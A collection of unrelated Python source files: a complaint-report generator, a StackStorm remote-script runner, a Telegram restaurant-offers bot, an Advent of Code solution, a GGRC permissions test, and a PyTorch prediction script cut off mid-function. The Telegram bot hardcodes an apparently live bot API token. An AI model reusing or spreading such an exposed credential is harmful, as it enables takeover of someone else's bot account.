ax.bar(ind, vis_2_pivot[column], width=0.7, bottom=vis_2_pivot.iloc[:, 0:row_idx].sum(axis=1), label=vis_2_pivot.columns[row_idx])\n bar_containers.append(bar_container)\n\n plt.xticks(ind, vis_2_pivot.index, rotation=270)\n\n for row_idx, rect in enumerate(bar_containers[-1]):\n ax.text(rect.get_x() + rect.get_width()/2., vis_2_pivot.ix[row_idx, 'Sum']+3, vis_2_pivot.ix[row_idx, 'Sum'].astype('int'), ha='center', va='bottom', fontsize='x-small')\n\n ax.set_ylabel('Quantity of TX 1.2 Complaints')\n ax.set_xlabel('Week of Incident')\n\n ax.legend()\n\n fig.savefig(os.path.join(pr.working_directory, 'bar_chart.pdf'), dpi=150, bbox_inches='tight')\n\n # Generate PDF report\n env = Environment(loader=FileSystemLoader(pr.script_directory))\n template = env.get_template('report_template.tex.jinja')\n\n template_kwargs = {\n 'all_pivot_full': all_pivot_full,\n 'without_low_tx_battery_pivot_full': without_low_tx_battery_pivot_full,\n 'without_pairing_failed_pivot_full': without_pairing_failed_pivot_full,\n 'all_unknown_tx_sn_count_full': all_unknown_tx_sn_count_full,\n 'without_low_tx_battery_unknown_tx_sn_count_full': without_low_tx_battery_unknown_tx_sn_count_full,\n 'without_pairing_issues_unknown_tx_sn_count_full': without_pairing_issues_unknown_tx_sn_count_full,\n\n 'all_pivot_nov_2016': all_pivot_nov_2016,\n 'without_low_tx_battery_pivot_nov_2016': without_low_tx_battery_pivot_nov_2016,\n 'without_pairing_failed_pivot_nov_2016': without_pairing_failed_pivot_nov_2016,\n 'all_unknown_tx_sn_count_nov_2016': all_unknown_tx_sn_count_nov_2016,\n 'without_low_tx_battery_unknown_tx_sn_count_nov_2016': without_low_tx_battery_unknown_tx_sn_count_nov_2016,\n 'without_pairing_issues_unknown_tx_sn_count_nov_2016': without_pairing_issues_unknown_tx_sn_count_nov_2016,\n\n 'all_pivot_dec_2016': all_pivot_dec_2016,\n 'without_low_tx_battery_pivot_dec_2016': without_low_tx_battery_pivot_dec_2016,\n 'without_pairing_failed_pivot_dec_2016': without_pairing_failed_pivot_dec_2016,\n 'all_unknown_tx_sn_count_dec_2016': all_unknown_tx_sn_count_dec_2016,\n 'without_low_tx_battery_unknown_tx_sn_count_dec_2016': without_low_tx_battery_unknown_tx_sn_count_dec_2016,\n 'without_pairing_issues_unknown_tx_sn_count_dec_2016': without_pairing_issues_unknown_tx_sn_count_dec_2016,\n\n 'all_pivot_jan_2017': all_pivot_jan_2017,\n 'without_low_tx_battery_pivot_jan_2017': without_low_tx_battery_pivot_jan_2017,\n 'without_pairing_failed_pivot_jan_2017': without_pairing_failed_pivot_jan_2017,\n 'all_unknown_tx_sn_count_jan_2017': all_unknown_tx_sn_count_jan_2017,\n 'without_low_tx_battery_unknown_tx_sn_count_jan_2017': without_low_tx_battery_unknown_tx_sn_count_jan_2017,\n 'without_pairing_issues_unknown_tx_sn_count_jan_2017': without_pairing_issues_unknown_tx_sn_count_jan_2017,\n\n 'all_pivot_feb_2017': all_pivot_feb_2017,\n 'without_low_tx_battery_pivot_feb_2017': without_low_tx_battery_pivot_feb_2017,\n 'without_pairing_failed_pivot_feb_2017': without_pairing_failed_pivot_feb_2017,\n 'all_unknown_tx_sn_count_feb_2017': all_unknown_tx_sn_count_feb_2017,\n 'without_low_tx_battery_unknown_tx_sn_count_feb_2017': without_low_tx_battery_unknown_tx_sn_count_feb_2017,\n 'without_pairing_issues_unknown_tx_sn_count_feb_2017': without_pairing_issues_unknown_tx_sn_count_feb_2017,\n\n 'all_pivot_mar_2017': all_pivot_mar_2017,\n 'without_low_tx_battery_pivot_mar_2017': without_low_tx_battery_pivot_mar_2017,\n 'without_pairing_failed_pivot_mar_2017': without_pairing_failed_pivot_mar_2017,\n 'all_unknown_tx_sn_count_mar_2017': 
all_unknown_tx_sn_count_mar_2017,\n 'without_low_tx_battery_unknown_tx_sn_count_mar_2017': without_low_tx_battery_unknown_tx_sn_count_mar_2017,\n 'without_pairing_issues_unknown_tx_sn_count_mar_2017': without_pairing_issues_unknown_tx_sn_count_mar_2017,\n \n 'all_pivot_apr_2017': all_pivot_apr_2017,\n 'without_low_tx_battery_pivot_apr_2017': without_low_tx_battery_pivot_apr_2017,\n 'without_pairing_failed_pivot_apr_2017': without_pairing_failed_pivot_apr_2017,\n 'all_unknown_tx_sn_count_apr_2017': all_unknown_tx_sn_count_apr_2017,\n 'without_low_tx_battery_unknown_tx_sn_count_apr_2017': without_low_tx_battery_unknown_tx_sn_count_apr_2017,\n 'without_pairing_issues_unknown_tx_sn_count_apr_2017': without_pairing_issues_unknown_tx_sn_count_apr_2017,\n\n 'all_pivot_may_2017': all_pivot_may_2017,\n 'without_low_tx_battery_pivot_may_2017': without_low_tx_battery_pivot_may_2017,\n 'without_pairing_failed_pivot_may_2017': without_pairing_failed_pivot_may_2017,\n 'all_unknown_tx_sn_count_may_2017': all_unknown_tx_sn_count_may_2017,\n 'without_low_tx_battery_unknown_tx_sn_count_may_2017': without_low_tx_battery_unknown_tx_sn_count_may_2017,\n 'without_pairing_issues_unknown_tx_sn_count_may_2017': without_pairing_issues_unknown_tx_sn_count_may_2017,\n\n 'all_pivot_jun_2017': all_pivot_jun_2017,\n 'without_low_tx_battery_pivot_jun_2017': without_low_tx_battery_pivot_jun_2017,\n 'without_pairing_failed_pivot_jun_2017': without_pairing_failed_pivot_jun_2017,\n 'all_unknown_tx_sn_count_jun_2017': all_unknown_tx_sn_count_jun_2017,\n 'without_low_tx_battery_unknown_tx_sn_count_jun_2017': without_low_tx_battery_unknown_tx_sn_count_jun_2017,\n 'without_pairing_issues_unknown_tx_sn_count_jun_2017': without_pairing_issues_unknown_tx_sn_count_jun_2017,\n\n 'incident_week_pivot_df': vis_2_pivot\n }\n\n with open(os.path.join(pr.working_directory, 'report.tex'), 'w') as f:\n f.write(template.render(**template_kwargs))\n\n # Run pdflatex\n subprocess.run(['pdflatex', os.path.join(pr.working_directory, 'report.tex'), '--output-directory', pr.working_directory], stdout=subprocess.DEVNULL, shell=True)\n subprocess.run(['pdflatex', os.path.join(pr.working_directory, 'report.tex'), '--output-directory', pr.working_directory], stdout=subprocess.DEVNULL, shell=True)\n\n # Export to Excel\n export_cols = OrderedDict()\n\n export_cols['psr_number'] = 'Complaint Number'\n export_cols['awareness_date'] = 'Awareness Date'\n export_cols['date_of_issue'] = 'Date of Issue'\n export_cols['problem_code_and_summary'] = 'Problem Code and Summary'\n export_cols['product_line_and_description'] = 'Product Line and Description'\n export_cols['serial_number'] = 'Serial Number (Free-text)'\n export_cols['ex_transmitter_sn'] = 'Transmitter Serial Number (Extracted)'\n export_cols['is_1.2_tx'] = 'Is Version 1.2 TX?'\n\n export_df = problem_reports.copy()\n export_df = export_df[list(export_cols.keys())].copy()\n export_df = export_df.rename(columns=export_cols)\n\n writer = pd.ExcelWriter(os.path.join(pr.working_directory, 'report.xlsx'), datetime_format='mm/dd/yyyy')\n export_df.to_excel(writer, index=False)\n writer.close()\n\n\ndef main():\n periodic_report = PeriodicReport(script_directory=os.path.dirname(os.path.abspath(__file__)))\n periodic_report.startup()\n\n searches = [\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/October 2016',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/November 2016',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/December 2016',\n '/Personal Searches/Periodic Reports/G5 
TX 1_2 Trending/January 2017',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/February 2017',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/March 2017',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/April 2017',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/May 2017',\n '/Personal Searches/Periodic Reports/G5 TX 1_2 Trending/June 2017',\n ]\n periodic_report.run_agileplm_searches(searches)\n\n work(periodic_report)\n\n\nif __name__ == '__main__':\n main()","sub_path":"G5 Transmitter 1.2 Trending/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":26017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119806161","text":"# Licensed to the StackStorm, Inc ('StackStorm') under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport uuid\n\nfrom oslo.config import cfg\n\nfrom st2common import log as logging\nfrom st2actions.runners.fabric_runner import BaseFabricRunner\nfrom st2actions.runners.fabric_runner import RUNNER_REMOTE_DIR\nfrom st2common.models.system.action import FabricRemoteScriptAction\n\n__all__ = [\n 'get_runner',\n 'RemoteScriptRunner'\n]\n\nLOG = logging.getLogger(__name__)\n\n\ndef get_runner():\n return RemoteScriptRunner(str(uuid.uuid4()))\n\n\nclass RemoteScriptRunner(BaseFabricRunner):\n def run(self, action_parameters):\n LOG.debug(' action_parameters = %s', action_parameters)\n\n remote_action = self._get_remote_action(action_parameters)\n\n LOG.debug('Will execute remote_action : %s.', str(remote_action))\n result = self._run(remote_action)\n LOG.debug('Executed remote_action : %s. Result is : %s.', remote_action, result)\n status = self._get_result_status(result, cfg.CONF.ssh_runner.allow_partial_failure)\n\n self._log_action_completion(logger=LOG, result=result, status=status)\n return (status, result, None)\n\n def _get_remote_action(self, action_parameters):\n # remote script actions without entry_point don't make sense, user probably wanted to use\n # \"run-remote\" action\n if not self.entry_point:\n msg = ('Action \"%s\" is missing entry_point attribute. 
Perhaps wanted to use '\n '\"run-remote\" runner?')\n raise Exception(msg % (self.action_name))\n\n script_local_path_abs = self.entry_point\n pos_args, named_args = self._get_script_args(action_parameters)\n named_args = self._transform_named_args(named_args)\n env_vars = self._get_env_vars()\n remote_dir = self.runner_parameters.get(RUNNER_REMOTE_DIR,\n cfg.CONF.ssh_runner.remote_dir)\n remote_dir = os.path.join(remote_dir, self.liveaction_id)\n return FabricRemoteScriptAction(self.action_name,\n str(self.liveaction_id),\n script_local_path_abs,\n self.libs_dir_path,\n named_args=named_args,\n positional_args=pos_args,\n env_vars=env_vars,\n on_behalf_user=self._on_behalf_user,\n user=self._username,\n password=self._password,\n private_key=self._private_key,\n remote_dir=remote_dir,\n hosts=self._hosts,\n parallel=self._parallel,\n sudo=self._sudo,\n timeout=self._timeout,\n cwd=self._cwd)\n","sub_path":"st2actions/st2actions/runners/remote_script_runner.py","file_name":"remote_script_runner.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602638249","text":"import logging\nimport pandas as pd\nimport telegram\nimport numpy as np\nimport random\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup \nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackQueryHandler\n\n\n# Reading Data\ndata = pd.read_csv(\"ig_scrapper/database/uni data/data_v1.01.csv\")\n\n# Temporal Data\nclass pt:\n ix = 0\n temp = pd.DataFrame()\n last = 0\n\n# Food Selection\nclass fd:\n\n postre = ('clasificacion', 'postre')\n desayuno = ('clasificacion', 'desayuno')\n gourmet = ('clasificacion', 'gourmet')\n chatarra = ('clasificacion', 'chatarra')\n combo = ('combo', True)\n pasapalo = ('clasificacion', 'pasapalo')\n cumple = ('Tortas',True)\n \n\n\n\n\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\ntoken = \"1203014270:AAEcmANbEwlLCtDqCW_xogdgUMU92xh9cxc\"\nbot = telegram.Bot(token=token)\n\ntry:\n chat_id = bot.get_updates()[-1].message.chat_id\nexcept IndexError:\n chat_id = 0\n\n####################################################################################################################\n\ndef mini_menu(update,context):\n keyboard = [\n \n [InlineKeyboardButton(\"🍳🥞Desayuno🥯🥪\", callback_data='desayuno')],\n [InlineKeyboardButton(\"🍝🍲Gourmet 🍱🍛\", callback_data='gourmet')],\n \n [InlineKeyboardButton(\"🍔🍟Chatarra🍕🌯\", callback_data='chatarra')],\n [InlineKeyboardButton(\"🧁🎂 Dulces 🍪🍩\", callback_data='postre')]\n \n ]\n \n return keyboard\n\ndef second_menu(update,context):\n keyboard = [\n \n [InlineKeyboardButton(\"🍔🍟Combos🍪🥤\", callback_data='combo')],\n [InlineKeyboardButton(\"🍤🥗Pasapalos 🧀🍾\", callback_data='pasapalo')],\n [InlineKeyboardButton(\"🎂🍮Cumpleaños🥧🥮\", callback_data='cumple')]\n \n ]\n \n return keyboard\n\ndef start(update, context):\n\n keyboard = mini_menu(update,context)\n reply_markup = InlineKeyboardMarkup(keyboard)\n\n update.message.reply_text('Hola '+'**'+str(update.message.chat.username)+'**'+''' Soy un Bot que trae ofertas de difrentes restaurantes en Valencia. 
\n Si quieres Mas selecciona /menu\n Mayor Informacion de este Bot /soporte''', reply_markup=reply_markup)\n \ndef clasificacion_data(data, columna, seleccion):\n \n temp = data[data[columna]==seleccion]\n ix = list(temp.index)\n random.shuffle(ix)\n return ix, temp\n\ndef next_fun( update, context, \n nx, temp, last):\n \n \n ruta = 'ig_scrapper/database/images/'\n url_ig = 'https://www.instagram.com' + str(temp['user url'][nx])\n \n if nx == last:\n\n keyboard = mini_menu(update,context)\n reply_markup = InlineKeyboardMarkup(keyboard)\n update.callback_query.message.reply_text('Ups😵, por ahora mi data es limitada😓', reply_markup=reply_markup)\n\n else:\n context.bot.send_photo(chat_id=update.effective_chat.id, photo = open( ruta + str(temp['img name'][nx]),'rb'))\n \n if (temp['ws'][nx] is 'False') | (temp['ws'][nx] is False):\n \n keyboard = [\n \n [InlineKeyboardButton(\"Instagram\", url=url_ig)],\n\n [InlineKeyboardButton(\"⏹Menu\", callback_data='menu_'),\n InlineKeyboardButton(\"Siguiente▶️\", callback_data='next_fun')]\n \n ]\n else:\n url_ws = 'https://api.whatsapp.com/send?phone=+58'+ str(temp['ws'][nx]) +'&text=Hola,%20Te%20encontre%20gracias%20Offer_Eat%20Telegram'\n keyboard = [\n \n [InlineKeyboardButton(\"Whatsapp\", url=url_ws),\n InlineKeyboardButton(\"Instagram\", url=url_ig)],\n\n [InlineKeyboardButton(\"⏹Menu\", callback_data='menu_'),\n InlineKeyboardButton(\"Siguiente▶️\", callback_data='next_fun')]\n \n ]\n \n reply_markup = InlineKeyboardMarkup(keyboard)\n\n # Some Items doesn't have content\n\n if temp['content'][nx] is 'False' | (temp['content'][nx] is False):\n update.callback_query.message.reply_text('Cuenta: '+ str(temp['user name'][nx]), reply_markup=reply_markup)\n else:\n update.callback_query.message.reply_text('Cuenta: '+ str(temp['user name'][nx]) + '\\n' + temp['content'][nx], reply_markup=reply_markup)\n \n \n\ndef post_fun(update,context, data, fd):\n\n ix, temp = clasificacion_data(data, fd[0], fd[1])\n \n \n # Saving in temporal Class\n\n pt.ix = iter(ix)\n pt.temp = temp\n pt.last = ix[-1]\n \n\n next_fun(update, context, \n next(pt.ix), pt.temp, pt.last)\n \n \n \n\n\ndef post(update, context):\n \n context.bot.send_photo(chat_id=update.effective_chat.id, photo = open( 'ig_scrapper/database/images/image0.jpg','rb'))\n update.message.reply_text(data['content'][0])\n \n\ndef soporte(update, context):\n \n update.message.reply_text('''Este Bot esta en Version Beta, la idea simplificar la busqueda de restaurantes en Valencia.\n Desarrolado por Juan Vicente ventrone\n si deseas contactar a mi creador: https://t.me/JVentrone''')\n \ndef menu(update, context):\n \n k_1 = mini_menu(update,context)\n k_2 = second_menu(update,context)\n\n keyboard = k_1 + k_2\n reply_markup = InlineKeyboardMarkup(keyboard)\n\n try:\n update.message.reply_text('Para Mayor Informacion /soporte', reply_markup=reply_markup)\n except:\n update.callback_query.message.reply_text('Para Mayor Informacion /soporte', reply_markup=reply_markup)\n\n\ndef progresivo(update,context):\n \n if pt.ix == 0: return menu(update, context)\n \n next_fun(update, context, \n next(pt.ix), pt.temp, pt.last)\n\n# This is bad, but it's just a propotype after, I will Fix this Chorizo!\ndef desayuno(update, context): post_fun(update,context,data, fd.desayuno)\ndef gourmet(update, context): post_fun(update,context,data, fd.gourmet)\ndef gourmet(update, context): post_fun(update,context,data, fd.gourmet)\ndef chatarra(update, context): post_fun(update,context,data, fd.chatarra)\ndef postre(update, context): 
post_fun(update,context,data, fd.postre)\ndef combo(update, context): post_fun(update,context,data, fd.combo)\ndef pasapalo(update, context): post_fun(update,context,data, fd.pasapalo)\ndef cumple(update, context): post_fun(update,context,data, fd.cumple)\n\n\n\n\ndef main():\n \n \n # Create the Updater and pass it your bot's token.\n # Make sure to set use_context=True to use the new context based callbacks\n # Post version 12 this will no longer be necessary\n updater = Updater(\"1203014270:AAEcmANbEwlLCtDqCW_xogdgUMU92xh9cxc\", use_context=True)\n\n # Get the dispatcher to register handlers\n dp = updater.dispatcher\n\n # on different commands - answer in Telegram\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(CommandHandler(\"menu\", menu))\n dp.add_handler(CommandHandler(\"soporte\", soporte))\n \n # Bottons Commander \n dp.add_handler(CallbackQueryHandler(progresivo, pattern='^next_fun$'))\n dp.add_handler(CallbackQueryHandler(desayuno, pattern='^desayuno$'))\n dp.add_handler(CallbackQueryHandler(gourmet, pattern='^gourmet$'))\n dp.add_handler(CallbackQueryHandler(postre, pattern='^postre$'))\n dp.add_handler(CallbackQueryHandler(chatarra, pattern='^chatarra$'))\n dp.add_handler(CallbackQueryHandler(combo, pattern='^combo$'))\n dp.add_handler(CallbackQueryHandler(cumple, pattern='^cumple$'))\n dp.add_handler(CallbackQueryHandler(pasapalo, pattern='^pasapalo$'))\n dp.add_handler(CallbackQueryHandler(menu, pattern='^menu_$'))\n \n # Start the Bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n \n\n\nif __name__ == '__main__':\n main()\n","sub_path":"_init_.py","file_name":"_init_.py","file_ext":"py","file_size_in_byte":8155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115616703","text":"#!/usr/local/bin/python3\n\nimport copy\n\nneighbours = [(-1, -1, -1),\n (-1, 0, -1),\n (-1, 1, -1),\n (0, -1, -1),\n (0, 1, -1),\n (1, -1, -1),\n (1, 0, -1),\n (1, 1, -1),\n (-1, -1, 0),\n (-1, 0, 0),\n (-1, 1, 0),\n (0, -1, 0),\n (0, 1, 0),\n (1, -1, 0),\n (1, 0, 0),\n (1, 1, 0),\n (-1, -1, 1),\n (-1, 0, 1),\n (-1, 1, 1),\n (0, -1, 1),\n (0, 1, 1),\n (1, -1, 1),\n (1, 0, 1),\n (1, 1, 1),\n (0, 0, -1),\n (0, 0, 1)]\n \ndef prefill_grid(size):\n grid = []\n for z in range(0,size):\n grid.append([])\n for y in range(0,size):\n grid[z].append([])\n for x in range(0,size):\n grid[z][y].append(\".\")\n return grid\n \ndef load_grid(location, size):\n grid = prefill_grid(size)\n offset = int(size / 2)\n input = []\n with open(str(location), 'r') as file:\n for line in file:\n input.append(list(line.rstrip()))\n for y, l in enumerate(input):\n for x, c in enumerate(l):\n grid[offset][offset + y][offset + x] = c\n return grid\n \ndef process_node(x, y, z, grid, new_grid):\n current_value = grid[z][y][x]\n inactive = 0\n active = 0\n for node in neighbours:\n if -1 < z + node[2] < len(grid) and -1 < y + node[1] < len(grid[x]) and -1 < x + node[0] < len(grid[x][y]):\n node_value = grid[z + node[2]][y + node[1]][x + node[0]]\n if node_value == \".\":\n inactive += 1\n elif node_value == \"#\":\n active += 1\n if current_value == \"#\" and not 1 < active < 4:\n new_grid[z][y][x] = \".\"\n elif current_value == \".\" and active == 3:\n new_grid[z][y][x] = \"#\"\n return new_grid\n\ndef run_cycle(grid):\n new_grid = 
copy.deepcopy(grid)\n for z, layer in enumerate(grid):\n for y, row in enumerate(layer):\n for x, char in enumerate(row):\n new_grid = process_node(x, y, z, grid, new_grid)\n return new_grid\n\ndef process_grid(location):\n size = 26\n grid = load_grid(location, size)\n for _ in range(0,6):\n grid = run_cycle(grid)\n count = 0\n for layer in grid:\n for row in layer:\n count += row.count(\"#\")\n print(location + \" - Active Count: \" + str(count))\n\nprocess_grid(\"17-test.txt\")\nprocess_grid(\"17-input.txt\")\n\n","sub_path":"day17/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"540813447","text":"# Copyright (C) 2017 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"Test Mapping Issue mapping\"\"\"\n\nfrom ddt import data, ddt, unpack\nfrom ggrc.app import app # NOQA pylint: disable=unused-import\nfrom ggrc.models import all_models\nfrom integration.ggrc import TestCase\nfrom integration.ggrc.api_helper import Api\nfrom integration.ggrc.models import factories\nfrom integration.ggrc_basic_permissions.models \\\n import factories as rbac_factories\n\n\ndef _get_map_dict(destination, source):\n return {\n 'relationship': {\n \"context\": {\n \"id\": destination.context.id,\n \"type\": \"Context\"\n },\n \"source\": {\n \"id\": source.id,\n \"type\": source.type\n },\n \"destination\": {\n \"id\": destination.id,\n \"type\": destination.type\n }\n }\n }\n\n\n@ddt\nclass TestIssueMapping(TestCase):\n \"\"\"Test Issue mapping\"\"\"\n\n def setup_roles(self):\n \"\"\"Setup necessary roles needed by the tests\"\"\"\n query = all_models.Role.query\n self.roles = {\n 'creator': query.filter_by(name=\"Creator\").first(),\n 'auditor': query.filter_by(name=\"Auditor\").first(),\n 'program_editor': query.filter_by(name=\"ProgramEditor\").first()\n }\n\n def setup_users(self):\n \"\"\"Creates two creator users\"\"\"\n self.users = {}\n for user_name in ('auditor', 'auditlead'):\n user = factories.PersonFactory()\n rbac_factories.UserRoleFactory(\n role=self.roles['creator'],\n person=user)\n self.users[user_name] = user\n\n def setup_audits(self):\n \"\"\"Create an audit and an archived audit\"\"\"\n self.audits = {\n False: self.create_audit(archived=False),\n True: self.create_audit(archived=True)\n }\n\n def setup_snapshots_and_issue(self):\n \"\"\"Create snapshot & issue objects\"\"\"\n self.snapshots = {}\n self.issues = {}\n self.control = factories.ControlFactory()\n revision = all_models.Revision.query.filter(\n all_models.Revision.resource_type == self.control.type).first()\n for is_archived in (False, True):\n audit = self.audits[is_archived]\n # Create a snapshot\n self.snapshots[is_archived] = factories.SnapshotFactory(\n child_id=revision.resource_id,\n child_type=revision.resource_type,\n revision=revision,\n parent=audit,\n context=audit.context,\n )\n # Create an issue\n issue = factories.IssueFactory()\n self.issues[is_archived] = issue\n # Map issue to audit\n factories.RelationshipFactory(\n source=audit,\n destination=issue,\n context=audit.context\n )\n\n def create_audit(self, archived=False):\n \"\"\"Create an audit object and fix the it's context\"\"\"\n audit = factories.AuditFactory(\n contact=self.users['auditlead'],\n archived=archived\n )\n\n # Add auditor & program editor roles\n rbac_factories.UserRoleFactory(\n context=audit.context,\n role=self.roles['auditor'],\n person=self.users['auditor'])\n 
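# In addition to the global Creator role assigned in setup_users, the audit lead is\n    # granted ProgramEditor on the parent program's context:\n    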
rbac_factories.UserRoleFactory(\n context=audit.program.context,\n role=self.roles['program_editor'],\n person=self.users['auditlead'])\n\n return audit\n\n def setUp(self):\n \"\"\"Prepare data needed to run the tests\"\"\"\n self.api = Api()\n self.setup_roles()\n self.setup_users()\n self.setup_audits()\n self.setup_snapshots_and_issue()\n\n @data(\n # user_name, is_archived\n ('auditor', True),\n ('auditlead', True),\n ('auditor', False),\n ('auditlead', False),\n )\n @unpack\n def test_mapping_to_issue(self, user_name, is_archived):\n \"\"\"Test mapping snapshots to issue\"\"\"\n user = self.users[user_name]\n payload = _get_map_dict(\n self.snapshots[is_archived],\n self.issues[is_archived])\n self.api.set_user(user)\n\n # Try to map to audit\n response = self.api.post(all_models.Relationship, payload)\n self.assertStatus(response, 201)\n\n rel_id = response.json['relationship']['id']\n relationship = all_models.Relationship.query.filter_by(id=rel_id).first()\n response = self.api.delete(relationship)\n self.assertStatus(response, 200)\n","sub_path":"test/integration/ggrc_basic_permissions/test_issue_mapping.py","file_name":"test_issue_mapping.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"318584721","text":"#import all imports and parameters from import_parameters.py\n\nfrom import_parameters import *\n\nparser = argparse.ArgumentParser(description = 'All arguments to be used in predicting')\nparser.add_argument ('--checkpoint', default = 'checkpoint.pth', help = 'Filename of checkpoint (default = checkpoint.pth)', metavar = '')\nparser.add_argument ('--arch', metavar='ARCH', default='vgg16', help='Chose between two options; densenet161 or vgg16 (default is vgg16)')\nparser.add_argument ('--device', default = 'GPU', help = 'Chose which device will be used to predict (default is GPU if available, otherwise CPU)')\nparser.add_argument ('--train_dir', default = 'flowers/train', help = 'Directory of training fotos, this needs to be mentioned', metavar = '')\nparser.add_argument ('--image_path', default = \"flowers/test/10/image_07090.jpg\", help = 'Image path of immage to be classified (default is flowers/test/10/image_07090.jpg)', metavar = '')\nparser.add_argument ('--hidden_units', default = 512, type=int, help = 'Number of units in the first hidden layer (default is 512)')\n\nargs = parser.parse_args()\n\n\nfilepath = args.checkpoint\narch = args.arch\nimage_path = args.image_path\nhidden_units = args.hidden_units\n\n\n#defining if model should be run on cpu or GPU\nif args.device == 'cpu':\n device = 'cpu'\n print('Device is set to cpu')\nelif args.device == 'GPU':\n if (torch.cuda.is_available()):\n device = 'cuda'\n print('GPU device is available and will be set to GPU')\n\n else:\n device = 'cpu'\n print ('Device could not be set to GPU, therefore device is cpu')\n\n\n\n\n\n\n\n\n\n\n\n\nprint('setting parameters')\n#Setting directories\ndata_dir = 'flowers'\ntrain_dir = args.train_dir\nvalid_dir = data_dir + '/valid'\ntest_dir = data_dir + '/test'\n\n\nprint('define data transforms')\ndata_transforms = {\n 'train': transforms.Compose([\n transforms.RandomRotation(random_rotation),\n transforms.RandomResizedCrop(random_resize),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(network_means, network_stds) ]),\n\n 'validate' : transforms.Compose([\n transforms.Resize(resize),\n transforms.CenterCrop(center_crop),\n transforms.ToTensor(),\n 
transforms.Normalize(network_means, network_stds) ]),\n\n 'test' : transforms.Compose([\n transforms.Resize(resize),\n transforms.CenterCrop(center_crop),\n transforms.ToTensor(),\n transforms.Normalize(network_means, network_stds) ])\n}\n\nprint('define what are the datasets')\n# Load the datasets with ImageFolder\ntrain_dir = args.train_dir\n\nimage_datasets = {\n 'train': datasets.ImageFolder(train_dir, transform= data_transforms['train']),\n 'validate': datasets.ImageFolder(valid_dir, transform = data_transforms['validate']),\n 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test'])\n}\n\n\n\n\nprint('define dataloader')\n# Define the dataloaders using the image datasets and the trainforms\ndataloaders = {\n 'train': torch.utils.data.DataLoader(image_datasets['train'], batch_size = 64, shuffle = True),\n 'validate': torch.utils.data.DataLoader(image_datasets['validate'], batch_size = 32),\n 'test': torch.utils.data.DataLoader(image_datasets['test'], batch_size = 32)\n}\n\n\n\n\n\nprint('define model architecture')\n## define model architecture\n#Define model and classifier size dependant on chosen model\narch = args.arch\nmodel = models.__dict__[args.arch](pretrained=True)\nif arch == \"vgg16\":\n layers = [25088, hidden_units, 200, 102]\n\nelif arch == 'densenet161':\n layers = [2208, hidden_units, 200, 102]\n\n# model = models.vgg16(pretrained=True)\n\n# don't compute gradients\nfor param in model.parameters():\n param.requires_grad = False\n\n\n\n\n#defining build_classifier\nprint('define build_classifier')\ndef build_classifier(layers):\n\n\n classifier = nn.Sequential(\n nn.Linear(layers[0], layers[1]),\n nn.ReLU(),\n nn.Dropout(0.5), #50 % probability\n nn.Linear(layers[1], layers[2]),\n torch.nn.ReLU(),\n torch.nn.Dropout(0.2), #20% probability\n nn.Linear(layers[2], layers[3]),\n nn.LogSoftmax(dim=1))\n\n return classifier\n\n\n\n\n\n\n\n\n\n\n\n#defining load_checkpoint\nprint('define load_checkpoint')\ndef load_checkpoint(filepath, arch):\n\n checkpoint = torch.load(filepath, map_location=lambda storage, loc: storage)\n model = models.vgg16(pretrained=True)\n\n # Freeze the feature parameters\n for params in model.parameters():\n params.requires_grad = False\n\n #create new classifier\n classifier = build_classifier(layers)\n model.classifier = classifier\n\n\n criterion = nn.NLLLoss()\n\n optimizer = optim.Adam(model.classifier.parameters(), lr = 0.001)\n\n\n model.class_to_idx = checkpoint['class_to_idx']\n\n model.load_state_dict(checkpoint['model_state_dict'])\n\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n\n return model, criterion\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nprint('define validate_model')\ndef validate_model(model , criterion , dataloader ):\n model.eval()\n model.cuda()\n sum_loss = 0\n sum_accuracy = 0\n\n for data in iter(dataloader):\n inputs, labels = data\n\n inputs = inputs.float().cuda()\n labels = labels.long().cuda()\n\n inputs = Variable(inputs)\n labels = Variable(labels)\n\n output = model.forward(inputs)\n loss = criterion(output, labels)\n sum_loss += loss\n ps = torch.exp(output).data\n\n equality = labels.data == ps.max(1)[1]\n sum_accuracy += equality.type_as(torch.FloatTensor()).mean()\n\n loss_rate = sum_loss / len(dataloader)\n accuracy_rate = sum_accuracy / 